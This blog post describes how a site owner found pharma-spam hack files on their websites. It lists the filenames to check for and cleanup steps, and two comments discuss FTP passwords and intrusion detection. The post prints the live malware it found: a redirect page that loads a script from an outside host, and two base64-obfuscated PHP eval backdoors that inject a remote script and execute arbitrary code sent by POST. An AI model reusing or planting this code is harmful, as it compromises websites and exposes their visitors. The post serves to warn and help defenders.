The “Comber 38” Viagra Hack

- by

Just when I though the Drunkjeans Hack had passed over, there’s another attack on a couple of my sites. I’ll call it the “Comber 38” hack. These hacks are most likely related.

What does this hack do?

With Comber 38, your sites are turned into Viagra Promo sites. Search for “viagra hack” and you’ll see how common this problem is.

Even though your home page may still work, the hackers use your site as a storage for images that can be pulled in from other sites, hence poncing off your server’s bandwidth.

If these files are linked to, your site is redirecting to some viagra site. It gioves the hackers and spammers direct link to a clean site rather than having to use their spam domains directly. If it wouldn’t be so evil, you ould argue it’s a pretty bright idea…

In fact, here’s what’s in one of those files:

<html>
<head>
<script>
location = 'http://cheapviagrarx.com/';
</script>
</head>
</html>
<script src=http://pkd.home.pl/regietow/button_krakow.php >
</script>

Apart from that, I’ve also discovered the following code at the top of my index.php file:

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnczRzJykpe2Z1bmN0aW9uIHM0cygkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzQnJaQzVvYjIxbExuQnNMM0psWjJsbGRHOTNMMkoxZEhSdmJsOXJjbUZyYjNjdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBzNHMyKCRhLCRiLCRjLCRkKXtnbG9iYWwkczRzMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkczRzMSkpY2FsbF91c2VyX2Z1bmMoJHM0czEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3M0cycpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3M0cycpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRzNHNsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdzNHMyJykpIT0nczRzMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>

I removed it – but after a few hours it was back as this:

<? php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygncHh1eCcpKXtmdW5jdGlvbiBweHV4KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDNCclpDNW9iMjFsTG5Cc0wzSmxaMmxsZEc5M0wySjFkSFJ2Ymw5cmNtRnJiM2N1Y0dod0lENDhMM05qY21sd2REND0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIHB4dXgyKCRhLCRiLCRjLCRkKXtnbG9iYWwkcHh1eDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHB4dXgxKSljYWxsX3VzZXJfZnVuYygkcHh1eDEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3B4dXgnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdweHV4Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHB4dXhsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdweHV4MicpKSE9J3B4dXgyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>

After a while Google will determine infected sites as “not safe” and StopBadware.org will onpass this data to Firefox which in turn will block your site from being viewed.

Your hosting company may close down your site until you remove the thread.

What can we do about this, Cap’n?

At the moment, I assume that deleting the files will clear up the problem. Once that’s done, all we can hope for is that attacks will stay away until we can determine which security exploit (probably in Apache) has to be fixed. This is getting ridiculous!

If your site has been reported as “not safe”, you can help matters by requesting a review here and let StopBadware.org know that your site is no longer used for malicious activities.

Hack Variations

I’ve seen the following variations of these files. Please check your sites carefully if you see any of these or similar files (in which case, please leave a comment):

comber38.html / comber38.jpg
veld27.html/ veld27.jpg
spooky98.html / spooky98.jpg
hobnob59.thml / hobnob59.jpg
whoosh80.html / whoosh80.jpg
flight34.html / flight34.jpg
tiara30.html / tiara30.jpg
vista46.html / vista46.jpg
botch11.html / botch11.jpg
fetid47.html / fedif47.jpg
sullen50.html / sullen50.jpg
plea30.html / plea30.jpg
load38.html (interestingly without a .jpg variant)
craggy37.html / craggy 36.jpg
oxeye36.html
cradle60.html
sacred57.html
jacket78.html
orrery12.html
royal13.html
zigzag74.html
chance41.html

Conclusion

Thesse are troubling times, my friends! Please contribute below if your site has been compromised, and especially if you know how we can all prevent this from happening in the future.

Thanks 🙁



If you enjoy my content, please consider supporting me on Ko-fi. In return you can browse this whole site without any pesky ads! More details here.

2 thoughts on “The “Comber 38” Viagra Hack”

  1. Damn, I just found my site fajar.biz being hack by pharma sites. They force me to reinstall it and lost my previouse settings. Can you tell me how to protect it. It's been hacked twice.

  2. Hi ashtray,

    I found that they got in via my FTP password. God only knows how they got that, but I traced this back – this is the only way in to change or upload files. My advice is to change your FTP password regularly and use something like Strong Password Generator to create a really long code nobody can hack. Change it every month for safe measure.

    I also found that a host intrusion system is great for banning the IP address of hackers there and then after 10 hack attempts. I use OSSEC HIDS which seems to work wonders. I protect all my hosting clients like that now and haven’t had any problems since.

Leave a Comment!

This site uses Akismet to reduce spam. Learn how your comment data is processed.